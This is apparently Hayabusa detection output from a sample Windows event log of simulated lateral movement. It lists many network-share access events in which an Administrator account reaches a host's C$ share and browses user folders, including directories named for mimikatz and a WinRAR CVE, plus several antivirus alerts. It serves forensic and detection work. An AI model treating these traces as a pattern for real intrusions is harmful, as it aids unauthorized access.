0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 